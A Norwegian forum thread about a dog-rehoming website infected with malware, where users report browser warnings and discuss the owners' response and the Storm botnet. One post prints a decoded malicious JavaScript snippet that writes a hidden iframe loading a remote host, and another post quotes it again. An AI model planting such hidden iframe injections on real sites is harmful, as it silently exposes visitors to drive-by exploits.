[LØST] Ny norsk nettside infisert av malware

63 innlegg i emnet

Skrevet

Hmmm verken AV eller script block addon blokkerte noe nå - fant heller ikke noe på maskinen etter en onlinescan. Kun advarsel om at siden er smittekilde fra google i nettleser.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Har akkurat sendt en mail til to av administratorene på siden, så om jeg er heldig kan vi kanskje få en klarhet i dette. Om denne siden er blitt hacket kan være en grunn, for siden i seg selv virker jo ganske seriøs...

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet (endret)

Har akkurat sendt en mail til to av administratorene på siden, så om jeg er heldig kan vi kanskje få en klarhet i dette. Om denne siden er blitt hacket kan være en grunn, for siden i seg selv virker jo ganske seriøs...

det er bra at vi er fler som "gnåler" litt på dem..

har selv sendt fler mail til servetheworld. det ene svaret har jeg postet her i forumet, det andre lar fortsatt vente på seg. håper det løser seg uansett. :)

til orientering. siden er/har vært seriøs hele veien.

Endret av k-man
0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Fikk endelig svar etter noen dager venting.

Svar vedr. virus på omplasseringavhunder.no (klikk for å vise/skjule)

Hvorfor spør du så dumt? SELVFØLGELIG er det ikke vi som har gjort det! Og det er en som jobber med å få det bort...Sorry

Vennlig Hilsen Gudveig Wigg, Leder i FFOH.

Foreningen For Omplassering av Hunder.

5563 Førresfjorden

Skjønner ikke hvorfor hun skriver ''Hvorfor spør du så dumt?'' når jeg bare spurde henne om det var de opprinnelige eierene av siden som hadde lagt ut virus. Vil ikke ta spørsmålet som dumt, men kan kanskje tolkes slik. Hihi.

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

setter man in en "o" til i botnet får man bootnet.. støvelnet ha..ha.. :P

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Etter hva jeg kan se i kildekoden er dette etterfølgern til Stormbot malware koden.

http://en.wikipedia.org/wiki/Storm_botnet

Dette også gjenkjennes som Malware.

http://en.wikipedia.org/wiki/Malware

blir skremt av wikipedia sin artikkel, har ikke hørt en dr... siden jeg purret på tilbakemld på mail, noen som har vært på siden og sjekket? føler meg ikke kompetent til å ta den risiko å gå inn der.

anyone? :)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg har vært inne litt jevnlig og vil bare si det hele er nok så dynamisk... dvs.. Ny Dag, ny infeksjon... noen bryr seg til og med med å slette andres infeksjon(er) først.

For øyeblikket har de glemt som sist infiserte glemt å definere <body> og ikke minst, avslutte <style> (</style>). Dette fører til at ingen ting på siden, så nær som <body> delen, vil virke. body består forsåvidt bare av metadata og titlebar samt henting av google.js-analysescript.

Tross av det, vil antivirus trolig reagere når du går inn, da der ligger noe mistenkelig javascript-kryptering i bunnen, og det skriver seg inn i logg-mappen til nettleseren din.

Da jeg sjekket i går, decodet jeg det til å være:

window.status='Done';document.write('<iframe name=4461 src="http://add-block-filter.info/t/?'+Math.round(Math.random()*16872)+'4461'+'" width=444 height=38 style="display:none"></iframe>')

, som jeg executet noen ganger for å generere tall, men fikk bare 404 i andre enden.

-ZnarreZ-

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Jeg har vært inne litt jevnlig og vil bare si det hele er nok så dynamisk... dvs.. Ny Dag, ny infeksjon... noen bryr seg til og med med å slette andres infeksjon(er) først.

For øyeblikket har de glemt som sist infiserte glemt å definere <body> og ikke minst, avslutte <style> (</style>). Dette fører til at ingen ting på siden, så nær som <body> delen, vil virke. body består forsåvidt bare av metadata og titlebar samt henting av google.js-analysescript.

Tross av det, vil antivirus trolig reagere når du går inn, da der ligger noe mistenkelig javascript-kryptering i bunnen, og det skriver seg inn i logg-mappen til nettleseren din.

Da jeg sjekket i går, decodet jeg det til å være:

window.status='Done';document.write('<iframe name=4461 src="http://add-block-filter.info/t/?'+Math.round(Math.random()*16872)+'4461'+'" width=444 height=38 style="display:none"></iframe>')

, som jeg executet noen ganger for å generere tall, men fikk bare 404 i andre enden.

-ZnarreZ-

Husk at 404 er det de vil du skal se ;)

404 feilen er bare en generert side som kjører flere exploits!

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

Husk at 404 er det de vil du skal se ;)

404 feilen er bare en generert side som kjører flere exploits!

Jeg sjekket kildekoden, uten jeg fant noe mer der som skulle tilsi at de forsøkte å lure meg. Testet også med å nettleser maskert som IE7, IE8, FF2, FF3 og Opera uten jeg fikk frem noe annet innhold. Det kan dog hende websereren deres sjekker andre parameter før farlig innhold eventuelt dukker opp. (ev. bare IE6 som jeg ikke testet).

En bør allikevel være forsiktig med å besøke siden da den kan være midletidig nede for oppdatering eller unngå detections.

-ZnarreZ-

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

takk skal du ha. holde seg unna. håpløst opplegg fra eierenes side.:)

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Skrevet

For dere som er mer interesert i Stormbot og dette Malware infeksjonene av nettsider.

Jeg fant denne fine PDF filen (nei den er helt ren :P )

http://dump.no/files/403b6bf1b0aa/PSYB0T.pdf

Denne inneholder informasjon om malware som bruker Stormbot teknikken og infiserer Rutere (Som nå er det nye målet til hackere)

FØR: Virus på din PC

NÅ: Web / Rutere infisereres og gjøres til slaver i nettverk!

0

Del dette innlegget


Lenke til innlegg
Del på andre sider

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!


Start en konto

Logg inn

Har du allerede en konto? Logg inn her.


Logg inn nå

  • Hvem er aktive   0 medlemmer

    Ingen innloggede medlemmer aktive